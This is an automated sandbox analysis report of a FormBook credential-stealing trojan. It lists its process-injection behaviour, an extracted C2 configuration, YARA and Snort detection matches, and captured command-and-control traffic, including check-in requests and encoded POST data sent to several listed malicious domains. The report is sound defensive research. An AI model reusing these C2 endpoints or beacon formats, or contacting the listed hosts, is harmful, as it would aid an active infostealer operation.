Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qHpeBvr9cR.exe

Overview

General Information

Sample Name:qHpeBvr9cR.exe
Analysis ID:756313
MD5:f5bea76ffac05afbe19274595801184e
SHA1:93ef457bfcbc5f0860b1b7f6353ed6e9b0afd60e
SHA256:40dcfb704112265b383679baa3064cd7355bd02119b117f396e1b0283342362c
Tags:32exeFormbooktrojan
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • qHpeBvr9cR.exe (PID: 5588 cmdline: C:\Users\user\Desktop\qHpeBvr9cR.exe MD5: F5BEA76FFAC05AFBE19274595801184E)
    • febcldoukq.exe (PID: 5816 cmdline: "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef MD5: 96E050F99502FE7C52FD9B0F10202578)
      • febcldoukq.exe (PID: 5828 cmdline: "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef MD5: 96E050F99502FE7C52FD9B0F10202578)
        • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autochk.exe (PID: 3624 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
          • netsh.exe (PID: 5920 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.brennancorps.info/henz/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6611:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f070:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17df7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x17bf5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x176a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17cf7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa48a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1a0e9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac61:$sqlite3step: 68 34 1C 7B E1
    • 0x1a12b:$sqlite3text: 68 38 2A 90 C5
    • 0x1aca6:$sqlite3text: 68 38 2A 90 C5
    • 0x1a142:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.febcldoukq.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.febcldoukq.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x7d48:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x207a7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbff6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1952e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.febcldoukq.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x1932c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18dd8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1942e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x195a6:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xbbc1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18023:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1f51e:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20511:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.febcldoukq.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x1b820:$sqlite3step: 68 34 1C 7B E1
        • 0x1c398:$sqlite3step: 68 34 1C 7B E1
        • 0x1b862:$sqlite3text: 68 38 2A 90 C5
        • 0x1c3dd:$sqlite3text: 68 38 2A 90 C5
        • 0x1b879:$sqlite3blob: 68 53 D8 7F 8C
        • 0x1c3f3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.febcldoukq.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.5206.233.197.13549710802031453 11/30/22-01:10:42.253815
          SID:2031453
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5162.214.129.14949712802031453 11/30/22-01:10:50.366888
          SID:2031453
          Source Port:49712
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5206.233.197.13549710802031449 11/30/22-01:10:42.253815
          SID:2031449
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5162.214.129.14949712802031412 11/30/22-01:10:50.366888
          SID:2031412
          Source Port:49712
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5206.233.197.13549710802031412 11/30/22-01:10:42.253815
          SID:2031412
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5162.214.129.14949712802031449 11/30/22-01:10:50.366888
          SID:2031449
          Source Port:49712
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: qHpeBvr9cR.exeReversingLabs: Detection: 41%
          Source: qHpeBvr9cR.exeVirustotal: Detection: 36%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.eufidelizo.com/henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0XAvira URL Cloud: Label: malware
          Source: http://www.patrickguarte.com/henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0XAvira URL Cloud: Label: malware
          Source: www.brennancorps.info/henz/Avira URL Cloud: Label: malware
          Source: http://www.patrickguarte.com/henz/Avira URL Cloud: Label: malware
          Source: http://www.lyonfinancialusa.com/henz/Avira URL Cloud: Label: malware
          Source: http://www.afterdarksocial.club/henz/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: eufidelizo.comVirustotal: Detection: 8%Perma Link
          Source: www.eufidelizo.comVirustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeReversingLabs: Detection: 20%
          Machine Learning detection for sample
          Source: qHpeBvr9cR.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeJoe Sandbox ML: detected
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.brennancorps.info/henz/"]}
          Source: qHpeBvr9cR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: netsh.pdb source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00402654 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B25293 FindFirstFileExW,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B25293 FindFirstFileExW,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 2_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.patrickguarte.com
          Source: C:\Windows\explorer.exeNetwork Connect: 155.159.61.221 80
          Source: C:\Windows\explorer.exeDomain query: www.eufidelizo.com
          Source: C:\Windows\explorer.exeDomain query: www.lyonfinancialusa.com
          Source: C:\Windows\explorer.exeDomain query: www.afterdarksocial.club
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.217.47 80
          Source: C:\Windows\explorer.exeNetwork Connect: 206.233.197.135 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.214.129.149 80
          Source: C:\Windows\explorer.exeDomain query: www.19t221013d.tokyo
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.brennancorps.info/henz/
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzZl0jGQ0nXo34yzw==&8p08qr=2d0X HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/ZSQN3PeXGVgYZcA==&8p08qr=2d0X HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.185.217.47 192.185.217.47
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 68 4d 78 47 34 43 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 45 50 64 50 77 38 64 65 49 50 47 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ChMxG4C=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-EPdPw8deIPGkROeQLw).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.afterdarksocial.clubConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.afterdarksocial.clubUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.afterdarksocial.club/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 68 4d 78 47 34 43 3d 78 52 42 4e 59 66 6f 55 79 47 73 48 35 70 57 58 50 6b 34 67 55 52 30 62 31 78 47 6c 43 71 63 4a 6e 59 6f 75 65 4c 76 44 52 72 55 33 4c 74 52 78 78 42 4f 4b 54 58 37 56 68 44 53 6c 43 70 65 6a 56 38 35 48 73 5a 4b 50 31 65 30 39 69 47 6e 2d 6f 31 4c 7a 5a 54 4e 45 43 76 72 32 5a 51 63 57 66 59 35 34 36 45 77 73 4f 4d 41 54 43 73 4d 74 53 42 49 37 47 4f 4a 51 66 32 30 47 45 70 37 30 66 39 31 5f 75 6d 4e 79 4e 75 31 32 74 77 56 64 37 5a 42 4f 4f 71 62 36 35 79 43 5f 53 4c 32 6a 43 78 53 33 28 64 77 2d 6c 4b 73 73 68 47 53 56 63 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ChMxG4C=xRBNYfoUyGsH5pWXPk4gUR0b1xGlCqcJnYoueLvDRrU3LtRxxBOKTX7VhDSlCpejV85HsZKP1e09iGn-o1LzZTNECvr2ZQcWfY546EwsOMATCsMtSBI7GOJQf20GEp70f91_umNyNu12twVd7ZBOOqb65yC_SL2jCxS3(dw-lKsshGSVcA).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.patrickguarte.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.patrickguarte.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.patrickguarte.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 68 4d 78 47 34 43 3d 30 72 56 75 73 4f 28 4a 6e 64 6d 42 33 79 67 33 33 31 6c 64 33 47 58 57 33 64 4a 4e 62 61 42 51 37 6e 44 43 46 6b 6d 33 43 67 48 48 37 53 4d 36 72 76 75 47 67 41 5a 47 68 32 57 50 62 49 58 34 56 56 72 4b 4f 62 34 41 51 6f 41 65 31 38 75 43 6e 67 55 4a 57 52 4a 34 28 75 4d 75 76 4c 64 48 79 56 4a 38 50 6c 4b 54 30 4b 6c 59 70 47 46 38 6c 5f 30 42 45 76 4e 37 78 77 7a 4c 6c 5f 4f 6b 72 45 32 69 66 6e 64 45 6b 6c 55 52 5a 57 34 74 65 6b 4e 33 67 53 6d 47 61 63 31 43 47 36 33 69 70 30 37 32 47 35 4c 44 57 56 55 44 4e 46 7e 47 49 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ChMxG4C=0rVusO(JndmB3yg331ld3GXW3dJNbaBQ7nDCFkm3CgHH7SM6rvuGgAZGh2WPbIX4VVrKOb4AQoAe18uCngUJWRJ4(uMuvLdHyVJ8PlKT0KlYpGF8l_0BEvN7xwzLl_OkrE2ifndEklURZW4tekN3gSmGac1CG63ip072G5LDWVUDNF~GIA).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:10:29 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 21:55:23 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:10:48 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 